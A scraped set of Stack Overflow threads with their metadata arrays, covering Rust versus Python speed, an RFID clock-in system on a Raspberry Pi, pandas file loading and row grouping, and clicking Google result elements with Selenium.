[ "Rust by default doesn't have optimizations enabled, because it's annoying for debugging. That makes it, in debug mode, slower than Python. Enabling optimizations should fix that problem.\nThis behaviour is not specific to Rust, it's the default for most compilers (like gcc/g++ or clang for C/C++, both require the -O3 flag for maximum performance).\nYou can enable optimizations in Rust by adding the --release flag to the respective cargo commands, like:\ncargo run --release\n\nPython doesn't distinguish between with or without optimizations, because Python is an interpreted language and doesn't have an (explicit) compilation step.\nThis is the behavior of your code on my machine:\n\nPython: ~180ms\nRust: ~1750 ms\nRust (with --release): ~160ms\n\nPython's dict implementation is most likely written in C and heavily optimized, so it should be similar in performance to Rust's HashMap, which is exactly what I see on my machine.\n" ]
[ 0 ]
[]
[]
[ "hashmap", "python", "rust" ]
stackoverflow_0074592062_hashmap_python_rust.txt
Q: Simple system to track hours worked I am a total beginner and I think I underestimated my little project. I am trying to implement a simple attendance system that will give me the hours worked per day and later per month. I am using a Raspberry pi 3 b+ and RC522 Rfid reader plus 16x2 lcd display. The data ist stored in a database using MariaDB. The idea is to use it for student workers in a restaurant to clock in their hours. The employees still write down their hours, but if it works it could replace the paperwork, we will see. I know that there will be some concerns about legality, but thats up for the lawyers once I am done. However my issue is, that right now I am unable to clock in and clock out multiple users. It does work for one user. If I clock in User 1 it waits until there is a new clock out info, doesn't matter which user it is. So user 1 clock in, user 2 wants to clock in but he is registered to clock out and only then the database entry is transferred. I think it somehow would need to update the entries instantly. I think you can get the idea from the picture phpMyAdminScreenshot I think I need to get more info from the database and compare it to what I have. But I hit a wall now and I am unable to find a solution for my problem. The code I have right now: '#!/usr/bin/env python import time import datetime import RPi.GPIO as GPIO from mfrc522 import SimpleMFRC522 import mysql.connector import drivers db = mysql.connector.connect( host="localhost", user="xxx", passwd="xxx", database="attendancesystem" ) cursor = db.cursor() reader = SimpleMFRC522() display = drivers.Lcd() sign_in = 0 sign_out= 1 try: while True: display.lcd_clear() display.lcd_display_string("Transponder", 1) display.lcd_display_string("platzieren", 2) id, text = reader.read() ts = time.time() timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') cursor.execute("Select id, name FROM users WHERE rfid_uid="+str(id)) result = cursor.fetchone() display.lcd_clear() #if cursor.rowcount >= 1: #display.lcd_display_string("Willkommen " + result[1], 2) #cursor.execute("INSERT INTO attendance (user_id) VALUES (%s)", (result[0],) ) if sign_in == 0: sign_in = (sign_in +1) % 2 sign_out = (sign_out +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_in, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string(f"Angemeldet " + result[1], 1) elif sign_in == 1: sign_out = (sign_out +1) % 2 sign_in = (sign_in +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_out, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string (f"Abgemeldet " + result[1], 1) db.commit() else: display.lcd_display_string("Existiert nicht.", 1) time.sleep(2) finally: GPIO.cleanup()' My idea was to get one more database entry called signed_in and either have it as 0 or as 1. The signed_in status does update how I want it to, but I don't know how to continue from here. And I fail to be able to update the table I want to. My idea was to get user_id and check for this id the last status of the signed_in row, if it is 1 the timestamp will update the clock_out row and signed_in to 0. If it is 0 and clock_out is not NULL it will start a new row with the clock_in timestamp and switch signed_in to 1. I didn't have any luck with updating any database values, so I reverted back to INSERT. A: I would expect the database would only store events. These events would be from when they touched the RFID. The card would have an ID/employee number. Processing the database information would allow the calculation of who is on shift and the length of shifts worked etc. If there was an odd number of entries for an employee then you could assume they are on shift. Even number of entries would mean they have completed the shift. I don't have your hardware or database so I've created random RFID read events and used sqlite3. import datetime import random import sqlite3 import time class SimpleMFRC522: @staticmethod def read(): while random.randint(0, 30) != 10: # Create some delay/blocking time.sleep(1) employee_id = random.randint(0, 5) return employee_id, f'employee_{employee_id}' class MyDatabase: def __init__(self): self.db = sqlite3.connect('/tmp/my-test.db') with self.db: self.db.execute(""" CREATE TABLE IF NOT EXISTS workers ( id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, empl_no INTEGER, name TEXT, tap_event timestamp); """) self.db.commit() def insert_event(self, empl_no, name, timestamp): sqlite_insert_with_param = """INSERT INTO 'workers' ('empl_no', 'name', 'tap_event') VALUES (?, ?, ?);""" self.db.cursor() self.db.execute(sqlite_insert_with_param, (empl_no, name, timestamp)) self.db.commit() def worker_in(self, empl_no): sql_cmd = f"SELECT COUNT(*) FROM workers WHERE empl_no = {empl_no};" cursor = self.db.execute(sql_cmd) event_count, = cursor.fetchone() return event_count % 2 == 1 and event_count > 0 def last_shift(self, empl_no): sql_cmd = f"""SELECT tap_event FROM (SELECT * FROM workers WHERE empl_no = {empl_no} ORDER BY tap_event DESC LIMiT 2) ORDER BY tap_event ASC ;""" cursor = self.db.execute(sql_cmd) tap_in, tap_out = cursor.fetchall() start = datetime.datetime.fromtimestamp(tap_in[0]) end = datetime.datetime.fromtimestamp(tap_out[0]) return end - start def main(): db = MyDatabase() reader = SimpleMFRC522() while True: empl_no, name = reader.read() print(f"adding tap event for {name}") db.insert_event(empl_no, name, datetime.datetime.timestamp(datetime.datetime.now())) if db.worker_in(empl_no): print(f"\t{name} has started their shift") else: time_worked = db.last_shift(empl_no) print(f"\t{name} has left the building after {time_worked}") if __name__ == '__main__': main() This gave me a transcript as follows adding tap event for employee_5 employee_5 has started their shift adding tap event for employee_0 employee_0 has left the building after 0:02:10.154697 adding tap event for employee_3 employee_3 has left the building after 0:07:02.465903 adding tap event for employee_3 employee_3 has started their shift adding tap event for employee_2 employee_2 has left the building after 0:06:27.403874 adding tap event for employee_2 employee_2 has started their shift
Simple system to track hours worked
I am a total beginner and I think I underestimated my little project. I am trying to implement a simple attendance system that will give me the hours worked per day and later per month. I am using a Raspberry pi 3 b+ and RC522 Rfid reader plus 16x2 lcd display. The data ist stored in a database using MariaDB. The idea is to use it for student workers in a restaurant to clock in their hours. The employees still write down their hours, but if it works it could replace the paperwork, we will see. I know that there will be some concerns about legality, but thats up for the lawyers once I am done. However my issue is, that right now I am unable to clock in and clock out multiple users. It does work for one user. If I clock in User 1 it waits until there is a new clock out info, doesn't matter which user it is. So user 1 clock in, user 2 wants to clock in but he is registered to clock out and only then the database entry is transferred. I think it somehow would need to update the entries instantly. I think you can get the idea from the picture phpMyAdminScreenshot I think I need to get more info from the database and compare it to what I have. But I hit a wall now and I am unable to find a solution for my problem. The code I have right now: '#!/usr/bin/env python import time import datetime import RPi.GPIO as GPIO from mfrc522 import SimpleMFRC522 import mysql.connector import drivers db = mysql.connector.connect( host="localhost", user="xxx", passwd="xxx", database="attendancesystem" ) cursor = db.cursor() reader = SimpleMFRC522() display = drivers.Lcd() sign_in = 0 sign_out= 1 try: while True: display.lcd_clear() display.lcd_display_string("Transponder", 1) display.lcd_display_string("platzieren", 2) id, text = reader.read() ts = time.time() timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') cursor.execute("Select id, name FROM users WHERE rfid_uid="+str(id)) result = cursor.fetchone() display.lcd_clear() #if cursor.rowcount >= 1: #display.lcd_display_string("Willkommen " + result[1], 2) #cursor.execute("INSERT INTO attendance (user_id) VALUES (%s)", (result[0],) ) if sign_in == 0: sign_in = (sign_in +1) % 2 sign_out = (sign_out +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_in, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string(f"Angemeldet " + result[1], 1) elif sign_in == 1: sign_out = (sign_out +1) % 2 sign_in = (sign_in +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_out, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string (f"Abgemeldet " + result[1], 1) db.commit() else: display.lcd_display_string("Existiert nicht.", 1) time.sleep(2) finally: GPIO.cleanup()' My idea was to get one more database entry called signed_in and either have it as 0 or as 1. The signed_in status does update how I want it to, but I don't know how to continue from here. And I fail to be able to update the table I want to. My idea was to get user_id and check for this id the last status of the signed_in row, if it is 1 the timestamp will update the clock_out row and signed_in to 0. If it is 0 and clock_out is not NULL it will start a new row with the clock_in timestamp and switch signed_in to 1. I didn't have any luck with updating any database values, so I reverted back to INSERT.
[ "I would expect the database would only store events. These events would be from when they touched the RFID. The card would have an ID/employee number.\nProcessing the database information would allow the calculation of who is on shift and the length of shifts worked etc.\n\nIf there was an odd number of entries for an employee then you could assume they are on shift. Even number of entries would mean they have completed the shift.\nI don't have your hardware or database so I've created random RFID read events and used sqlite3.\nimport datetime\nimport random\nimport sqlite3\nimport time\n\n\nclass SimpleMFRC522:\n @staticmethod\n def read():\n while random.randint(0, 30) != 10: # Create some delay/blocking\n time.sleep(1)\n employee_id = random.randint(0, 5)\n return employee_id, f'employee_{employee_id}'\n\n\nclass MyDatabase:\n def __init__(self):\n self.db = sqlite3.connect('/tmp/my-test.db')\n with self.db:\n self.db.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS workers (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n empl_no INTEGER,\n name TEXT,\n tap_event timestamp);\n \"\"\")\n self.db.commit()\n\n def insert_event(self, empl_no, name, timestamp):\n sqlite_insert_with_param = \"\"\"INSERT INTO 'workers'\n ('empl_no', 'name', 'tap_event') \n VALUES (?, ?, ?);\"\"\"\n self.db.cursor()\n self.db.execute(sqlite_insert_with_param, (empl_no, name, timestamp))\n self.db.commit()\n\n def worker_in(self, empl_no):\n sql_cmd = f\"SELECT COUNT(*) FROM workers WHERE empl_no = {empl_no};\"\n cursor = self.db.execute(sql_cmd)\n event_count, = cursor.fetchone()\n return event_count % 2 == 1 and event_count > 0\n\n def last_shift(self, empl_no):\n sql_cmd = f\"\"\"SELECT tap_event FROM \n (SELECT * FROM workers WHERE empl_no = {empl_no} ORDER BY tap_event DESC LIMiT 2) \n ORDER BY tap_event ASC ;\"\"\"\n cursor = self.db.execute(sql_cmd)\n tap_in, tap_out = cursor.fetchall()\n start = datetime.datetime.fromtimestamp(tap_in[0])\n end = datetime.datetime.fromtimestamp(tap_out[0])\n return end - start\n\n\ndef main():\n db = MyDatabase()\n reader = SimpleMFRC522()\n while True:\n empl_no, name = reader.read()\n print(f\"adding tap event for {name}\")\n db.insert_event(empl_no, name, datetime.datetime.timestamp(datetime.datetime.now()))\n if db.worker_in(empl_no):\n print(f\"\\t{name} has started their shift\")\n else:\n time_worked = db.last_shift(empl_no)\n print(f\"\\t{name} has left the building after {time_worked}\")\n\n\nif __name__ == '__main__':\n main()\n\nThis gave me a transcript as follows\nadding tap event for employee_5\n employee_5 has started their shift\nadding tap event for employee_0\n employee_0 has left the building after 0:02:10.154697\nadding tap event for employee_3\n employee_3 has left the building after 0:07:02.465903\nadding tap event for employee_3\n employee_3 has started their shift\nadding tap event for employee_2\n employee_2 has left the building after 0:06:27.403874\nadding tap event for employee_2\n employee_2 has started their shift\n\n" ]
[ 0 ]
[]
[]
[ "mariadb", "python", "raspberry_pi", "raspberry_pi3", "rfid" ]
stackoverflow_0074591121_mariadb_python_raspberry_pi_raspberry_pi3_rfid.txt
Q: Python Dataframe find the file type, choose the correct pd.read_ and merge them I have a list of files to be imported into the data frame cdoe: # list contains the dataset name followed by the column name to match all the datasets; this list keeps changing and even the file formats. These dataset file names are provided by the user, and they are unique. # First: find the file extension format and select appropriate pd.read_ to import # second: merge the dataframes on the index # in the below list, file_list = ['dataset1.csv','datetime','dataset2.xlsx','timestamp'] df = pd.DataFrame() for i in range(0:2:len(file_list)): # find the file type first # presently, I don't know how to find the file type; so file_type = 'csv' # second: merge the dataframe into the existing dataframe on the index tdf = pd.DataFrame() if file_type == 'csv': tdf = pd.read_csv('%s'%(file_list[i]))) if file_type == 'xlsx': tdf = pd.read_excel('%s'%(file_list[i]))) tdf.set_index('%s'%(file_list[i+1]),inplace=True) # Merge dataframe with the existing dataframe df = df.merge(tdf,right_index=True,left_index=True) I reached this far. Is any direct module available to find the file type? I found magic but it has issues while importing it. Also, suggest a better approach to merge the files? Update: Working solution Inspired from the @ljdyer answer below, I came with the following and this is working perfectly: def find_file_type_import(file_name): # Total file extensions possible for importing data file_type = {'csv':'pd.read_csv(file_name)', 'xlsx':'pd.read_excel(file_name)', 'txt':'pd.read_csv(file_name)', 'parquet':'pd.read_parquet(file_name)', 'json':'pd.read_json(file_name)' } df = [eval(val) for key,val in file_type.items() if file_name .endswith(key)][0] return df df = find_file_type_import(file_list [0]) This is working perfectly. Thank you for your valuable suggestions. ALso, correct me with the use of eval is good one or not? A: The file type is just the three or four letters at the end of the file name, so the simplest way to do this would just be: if file_list[i].endswith('csv'): etc. Other commons options would be os.path.splitext or the suffix attribute of a Path object from the built-in os and pathlib libraries respectively. The way you are merging looks fine, but I'm not sure why you are using percent notation for the parameters to read_, set_index, etc. The elements of your list are just strings anyway, so for example tdf = pd.read_csv('%s'%(file_list[i]))) could just be: tdf = pd.read_csv(file_list[i]) (Answer to follow-up question) Really nice idea to use a dict! It is generally considered good practice to avoid eval wherever possible, so here's an alternative option with the pandas functions themselves as dictionary values. I also suggest a prettier syntax for your list comprehension with exactly one element based on this answer and some clearer variable names: def find_file_type_import(file_name): # Total file extensions possible for importing data read_functions = {'csv': pd.read_csv, 'xlsx': pd.read_excel, 'txt': pd.read_csv, 'parquet': pd.read_parquet, 'json': pd.read_json} [df] = [read(file_name) for file_ext, read in read_functions.items() if file_name.endswith(file_ext)] return df A: You can use glob (or even just os) to retrieve the list of files from a part of their name. Since you guarantee the uniqueness of the file irrespective of the extension, it will only be one (otherwise just put a loop that iterates over the retrieved elements). Once you have the full file name (which clearly has the extension), just do a split() taking the last element obtained that corresponds to the file extension. Then, you can read the dataframe with the appropriate function. Here is an example of code: from glob import glob file_list = [ 'dataset0', # corresponds to dataset0.csv 'dataset1', # corresponds to dataset1.xlsx 'dataset2.a' ] for file in file_list: files_with_curr_name = glob(f'*{file}*') if len(files_with_curr_name) > 0: full_file_name = files_with_curr_name[0] # take the first element, the uniqueness of the file name being guaranteed # extract the file extension (string after the dot, so the last element of split) file_type = full_file_name.split(".")[-1] if file_type == 'csv': print(f'Read {full_file_name} as csv') # df = pd.read_csv(full_file_name) elif file_type == 'xlsx': print(f'Read {full_file_name} as xlsx') else: print(f"Don't read {full_file_name}") Output will be: Read dataset0.csv as csv Read dataset1.xlsx as xlsx Don't read dataset2.a A: Using pathlib and a switch dict to call functions. from pathlib import Path import pandas as pd def main(files: list) -> None: caller = { ".csv": read_csv, ".xlsx": read_excel, ".pkl": read_pickle } for file in get_path(files): print(caller.get(file.suffix)(file)) def get_path(files: list) -> list: file_path = [x for x in Path.home().rglob("*") if x.is_file()] return [x for x in file_path if x.name in files] def read_csv(file: Path) -> pd.DataFrame: return pd.read_csv(file) def read_excel(file: Path) -> pd.DataFrame: return pd.read_excel(file) def read_pickle(file: Path) -> pd.DataFrame: return pd.read_pickle(file) if __name__ == "__main__": files_to_read = ["spam.csv", "ham.pkl", "eggs.xlsx"] main(files_to_read)
Python Dataframe find the file type, choose the correct pd.read_ and merge them
I have a list of files to be imported into the data frame cdoe: # list contains the dataset name followed by the column name to match all the datasets; this list keeps changing and even the file formats. These dataset file names are provided by the user, and they are unique. # First: find the file extension format and select appropriate pd.read_ to import # second: merge the dataframes on the index # in the below list, file_list = ['dataset1.csv','datetime','dataset2.xlsx','timestamp'] df = pd.DataFrame() for i in range(0:2:len(file_list)): # find the file type first # presently, I don't know how to find the file type; so file_type = 'csv' # second: merge the dataframe into the existing dataframe on the index tdf = pd.DataFrame() if file_type == 'csv': tdf = pd.read_csv('%s'%(file_list[i]))) if file_type == 'xlsx': tdf = pd.read_excel('%s'%(file_list[i]))) tdf.set_index('%s'%(file_list[i+1]),inplace=True) # Merge dataframe with the existing dataframe df = df.merge(tdf,right_index=True,left_index=True) I reached this far. Is any direct module available to find the file type? I found magic but it has issues while importing it. Also, suggest a better approach to merge the files? Update: Working solution Inspired from the @ljdyer answer below, I came with the following and this is working perfectly: def find_file_type_import(file_name): # Total file extensions possible for importing data file_type = {'csv':'pd.read_csv(file_name)', 'xlsx':'pd.read_excel(file_name)', 'txt':'pd.read_csv(file_name)', 'parquet':'pd.read_parquet(file_name)', 'json':'pd.read_json(file_name)' } df = [eval(val) for key,val in file_type.items() if file_name .endswith(key)][0] return df df = find_file_type_import(file_list [0]) This is working perfectly. Thank you for your valuable suggestions. ALso, correct me with the use of eval is good one or not?
[ "The file type is just the three or four letters at the end of the file name, so the simplest way to do this would just be:\nif file_list[i].endswith('csv'):\n\netc.\nOther commons options would be os.path.splitext or the suffix attribute of a Path object from the built-in os and pathlib libraries respectively.\nThe way you are merging looks fine, but I'm not sure why you are using percent notation for the parameters to read_, set_index, etc. The elements of your list are just strings anyway, so for example\ntdf = pd.read_csv('%s'%(file_list[i])))\n\ncould just be:\ntdf = pd.read_csv(file_list[i])\n\n\n(Answer to follow-up question)\nReally nice idea to use a dict! It is generally considered good practice to avoid eval wherever possible, so here's an alternative option with the pandas functions themselves as dictionary values. I also suggest a prettier syntax for your list comprehension with exactly one element based on this answer and some clearer variable names:\ndef find_file_type_import(file_name):\n # Total file extensions possible for importing data\n read_functions = {'csv': pd.read_csv,\n 'xlsx': pd.read_excel,\n 'txt': pd.read_csv,\n 'parquet': pd.read_parquet,\n 'json': pd.read_json}\n [df] = [read(file_name) for file_ext, read in read_functions.items()\n if file_name.endswith(file_ext)]\n return df\n\n", "You can use glob (or even just os) to retrieve the list of files from a part of their name. Since you guarantee the uniqueness of the file irrespective of the extension, it will only be one (otherwise just put a loop that iterates over the retrieved elements).\nOnce you have the full file name (which clearly has the extension), just do a split() taking the last element obtained that corresponds to the file extension.\nThen, you can read the dataframe with the appropriate function.\nHere is an example of code:\nfrom glob import glob\n\nfile_list = [\n 'dataset0', # corresponds to dataset0.csv\n 'dataset1', # corresponds to dataset1.xlsx\n 'dataset2.a'\n]\n\nfor file in file_list:\n files_with_curr_name = glob(f'*{file}*')\n\n if len(files_with_curr_name) > 0:\n full_file_name = files_with_curr_name[0] # take the first element, the uniqueness of the file name being guaranteed\n\n # extract the file extension (string after the dot, so the last element of split)\n file_type = full_file_name.split(\".\")[-1]\n\n if file_type == 'csv':\n print(f'Read {full_file_name} as csv')\n # df = pd.read_csv(full_file_name)\n elif file_type == 'xlsx':\n print(f'Read {full_file_name} as xlsx')\n else:\n print(f\"Don't read {full_file_name}\")\n\nOutput will be:\nRead dataset0.csv as csv\nRead dataset1.xlsx as xlsx\nDon't read dataset2.a\n\n", "Using pathlib and a switch dict to call functions.\nfrom pathlib import Path\n\nimport pandas as pd\n\n\ndef main(files: list) -> None:\n caller = {\n \".csv\": read_csv,\n \".xlsx\": read_excel,\n \".pkl\": read_pickle\n }\n\n for file in get_path(files):\n print(caller.get(file.suffix)(file))\n\n\ndef get_path(files: list) -> list:\n file_path = [x for x in Path.home().rglob(\"*\") if x.is_file()]\n\n return [x for x in file_path if x.name in files]\n\n\ndef read_csv(file: Path) -> pd.DataFrame:\n return pd.read_csv(file)\n\n\ndef read_excel(file: Path) -> pd.DataFrame:\n return pd.read_excel(file)\n\n\ndef read_pickle(file: Path) -> pd.DataFrame:\n return pd.read_pickle(file)\n\n\nif __name__ == \"__main__\":\n files_to_read = [\"spam.csv\", \"ham.pkl\", \"eggs.xlsx\"]\n main(files_to_read)\n\n" ]
[ 1, 1, 1 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074591735_dataframe_pandas_python.txt
Q: group DataFrame and increment group id if the number of rows have 3 consecutives same value I have a data frame that looks as follows: import pandas as pd max_skip=2 data = {'col1':['NT', 'NT', 'NT', 'T','T','T','NT', 'NT', 'T','T','T','NT', 'NT', 'NT',"T",'T','T','T','NT','NT']} # Create DataFrame df = pd.DataFrame(data) df I would like to group those data with the following rule: If the number of consecutive NT is more than max_skip, assign those rows to group 0 else assign those rows to the current group id (group id starts from 0) The next row will have its group id incremented if the previous row contains more than 2 (max_skip) consecutive NT, otherwise, the group id will still be the same. which need to give me the following result. But how could I achieve this with any available built-in function without having to loop each of the rows? df['group']=[0,0,0,1,1,1,1,1,1,1,1,0,0,0,2,2,2,2,2,2] A: I believe this can be done with one line, but it works. df['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size') df['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup() df['cumsum_']=df.groupby(['group'])['group'].cumsum() df['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum()) df['group']=df.groupby(['group']).ngroup() df=df.drop(['lenghts','cumsum_'],axis=1) print(df) ''' col1 group 0 NT 0 1 NT 0 2 NT 0 3 T 1 4 T 1 5 T 1 6 NT 1 7 NT 1 8 T 1 9 T 1 10 T 1 11 NT 0 12 NT 0 13 NT 0 14 T 2 15 T 2 16 T 2 17 T 2 18 NT 2 19 NT 2 Details: #Let's take how many times each value in col1 is repeated. df['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size') print(df) ''' col1 lenghts 0 NT 3 1 NT 3 2 NT 3 3 T 3 4 T 3 5 T 3 6 NT 2 7 NT 2 8 T 3 9 T 3 10 T 3 11 NT 3 12 NT 3 13 NT 3 14 T 4 15 T 4 16 T 4 17 T 4 18 NT 2 19 NT 2 ''' # now, write as 0 if col1 is NT and lenght is greater than "max_skip" df['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup() ''' col1 lenghts group 0 NT 3 0 1 NT 3 0 2 NT 3 0 3 T 3 1 4 T 3 1 5 T 3 1 6 NT 2 1 7 NT 2 1 8 T 3 1 9 T 3 1 10 T 3 1 11 NT 3 0 12 NT 3 0 13 NT 3 0 14 T 4 1 15 T 4 1 16 T 4 1 17 T 4 1 18 NT 2 1 19 NT 2 1 ''' #then we get the cumulative sum of the group column. If the group is 0, not 0, we define a new id with the code "df.cumsum_ != df.cumsum_.shift() + 1". df['cumsum_']=df.groupby(['group'])['group'].cumsum() df['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum()) ''' col1 lenghts group cumsum_ 0 NT 3 0 0 1 NT 3 0 0 2 NT 3 0 0 3 T 3 3 1 4 T 3 3 2 5 T 3 3 3 6 NT 2 3 4 7 NT 2 3 5 8 T 3 3 6 9 T 3 3 7 10 T 3 3 8 11 NT 3 0 0 12 NT 3 0 0 13 NT 3 0 0 14 T 4 7 9 15 T 4 7 10 16 T 4 7 11 17 T 4 7 12 18 NT 2 7 13 19 NT 2 7 14 ''' #It remains to define a new id according to the group column. df['group']=df.groupby(['group']).ngroup()
group DataFrame and increment group id if the number of rows have 3 consecutives same value
I have a data frame that looks as follows: import pandas as pd max_skip=2 data = {'col1':['NT', 'NT', 'NT', 'T','T','T','NT', 'NT', 'T','T','T','NT', 'NT', 'NT',"T",'T','T','T','NT','NT']} # Create DataFrame df = pd.DataFrame(data) df I would like to group those data with the following rule: If the number of consecutive NT is more than max_skip, assign those rows to group 0 else assign those rows to the current group id (group id starts from 0) The next row will have its group id incremented if the previous row contains more than 2 (max_skip) consecutive NT, otherwise, the group id will still be the same. which need to give me the following result. But how could I achieve this with any available built-in function without having to loop each of the rows? df['group']=[0,0,0,1,1,1,1,1,1,1,1,0,0,0,2,2,2,2,2,2]
[ "I believe this can be done with one line, but it works.\ndf['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size')\ndf['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup()\ndf['cumsum_']=df.groupby(['group'])['group'].cumsum()\ndf['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum())\ndf['group']=df.groupby(['group']).ngroup()\ndf=df.drop(['lenghts','cumsum_'],axis=1)\nprint(df)\n'''\n col1 group\n0 NT 0\n1 NT 0\n2 NT 0\n3 T 1\n4 T 1\n5 T 1\n6 NT 1\n7 NT 1\n8 T 1\n9 T 1\n10 T 1\n11 NT 0\n12 NT 0\n13 NT 0\n14 T 2\n15 T 2\n16 T 2\n17 T 2\n18 NT 2\n19 NT 2\n\nDetails:\n#Let's take how many times each value in col1 is repeated.\ndf['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size')\nprint(df)\n'''\n col1 lenghts\n0 NT 3\n1 NT 3\n2 NT 3\n3 T 3\n4 T 3\n5 T 3\n6 NT 2\n7 NT 2\n8 T 3\n9 T 3\n10 T 3\n11 NT 3\n12 NT 3\n13 NT 3\n14 T 4\n15 T 4\n16 T 4\n17 T 4\n18 NT 2\n19 NT 2\n'''\n\n# now, write as 0 if col1 is NT and lenght is greater than \"max_skip\"\ndf['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup() \n\n'''\n col1 lenghts group\n0 NT 3 0\n1 NT 3 0\n2 NT 3 0\n3 T 3 1\n4 T 3 1\n5 T 3 1\n6 NT 2 1\n7 NT 2 1\n8 T 3 1\n9 T 3 1\n10 T 3 1\n11 NT 3 0\n12 NT 3 0\n13 NT 3 0\n14 T 4 1\n15 T 4 1\n16 T 4 1\n17 T 4 1\n18 NT 2 1\n19 NT 2 1\n'''\n#then we get the cumulative sum of the group column. If the group is 0, not 0, we define a new id with the code \"df.cumsum_ != df.cumsum_.shift() + 1\".\n\ndf['cumsum_']=df.groupby(['group'])['group'].cumsum()\ndf['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum())\n\n'''\n col1 lenghts group cumsum_\n0 NT 3 0 0\n1 NT 3 0 0\n2 NT 3 0 0\n3 T 3 3 1\n4 T 3 3 2\n5 T 3 3 3\n6 NT 2 3 4\n7 NT 2 3 5\n8 T 3 3 6\n9 T 3 3 7\n10 T 3 3 8\n11 NT 3 0 0\n12 NT 3 0 0\n13 NT 3 0 0\n14 T 4 7 9\n15 T 4 7 10\n16 T 4 7 11\n17 T 4 7 12\n18 NT 2 7 13\n19 NT 2 7 14\n'''\n#It remains to define a new id according to the group column.\ndf['group']=df.groupby(['group']).ngroup()\n\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074587652_dataframe_pandas_python.txt
Q: How do I click on an item on my google search page with Selenium Python? Good time of the day! Faced with a seemingly simple problem, But it’s been a while, and I’m asking for your help. I work with Selenium on Python and I need to curse about 20 items on google search page by random request. And I’ll give you an example of the elements below, and the bottom line is, once the elements are revealed, Google generates new such elements Problem: Cannot click on the element. I will need to click on existing and then on new, generated elements in this block: click for open see blocks with element Tried to click on xpath, having collected all the elements: xpath = '//*[@id="qmCCY_adG4Sj3QP025p4__16"]/div/div/div[1]/div[4]' all_elements = driver.find_element(By.XPATH, value=xpath) for element in all_elements: element.click() sleep(2) Important note! id xpath has constantly changing and is generated by another on the google side Tried to click on the class class="r21Kzd" Tried to click on the selector: #qmCCY_adG4Sj3QP025p4__16 > div > div > div > div.wWOJcd > div.r21Kzd Errors This is when I try to click using xpath: Message: no such element: Unable to locate element: {"method":"xpath","selector"://*[@id="vU-CY7u3C8PIrgTuuJH4CQ_9"]/div/div[1]/div[4]} In other cases, the story is almost the same, the driver does not find the element and cannot click on it. Below I apply a scratch tag on which I need to click screenshot tags on google search Thanks for the help! A: In case iDjcJe IX9Lgd wwB5gf are a fixed class name values of that element all you need is to use CSS_SELECTOR instead of CLASS_NAME with a correct syntax of CSS Selectors. So, instead of driver.find_element(By.CLASS_NAME, "iDjcJe IX9Lgd wwB5gf") try using this: driver.find_element(By.CSS_SELECTOR, ".iDjcJe.IX9Lgd.wwB5gf") (dots before each class name, no spaces between them)
How do I click on an item on my google search page with Selenium Python?
Good time of the day! Faced with a seemingly simple problem, But it’s been a while, and I’m asking for your help. I work with Selenium on Python and I need to curse about 20 items on google search page by random request. And I’ll give you an example of the elements below, and the bottom line is, once the elements are revealed, Google generates new such elements Problem: Cannot click on the element. I will need to click on existing and then on new, generated elements in this block: click for open see blocks with element Tried to click on xpath, having collected all the elements: xpath = '//*[@id="qmCCY_adG4Sj3QP025p4__16"]/div/div/div[1]/div[4]' all_elements = driver.find_element(By.XPATH, value=xpath) for element in all_elements: element.click() sleep(2) Important note! id xpath has constantly changing and is generated by another on the google side Tried to click on the class class="r21Kzd" Tried to click on the selector: #qmCCY_adG4Sj3QP025p4__16 > div > div > div > div.wWOJcd > div.r21Kzd Errors This is when I try to click using xpath: Message: no such element: Unable to locate element: {"method":"xpath","selector"://*[@id="vU-CY7u3C8PIrgTuuJH4CQ_9"]/div/div[1]/div[4]} In other cases, the story is almost the same, the driver does not find the element and cannot click on it. Below I apply a scratch tag on which I need to click screenshot tags on google search Thanks for the help!
[ "In case iDjcJe IX9Lgd wwB5gf are a fixed class name values of that element all you need is to use CSS_SELECTOR instead of CLASS_NAME with a correct syntax of CSS Selectors.\nSo, instead of driver.find_element(By.CLASS_NAME, \"iDjcJe IX9Lgd wwB5gf\") try using this:\ndriver.find_element(By.CSS_SELECTOR, \".iDjcJe.IX9Lgd.wwB5gf\")\n\n(dots before each class name, no spaces between them)\n" ]
[ 0 ]
[]
[]
[ "css_selectors", "python", "selenium", "selenium_chromedriver", "selenium_webdriver" ]
stackoverflow_0074585644_css_selectors_python_selenium_selenium_chromedriver_selenium_webdriver.txt
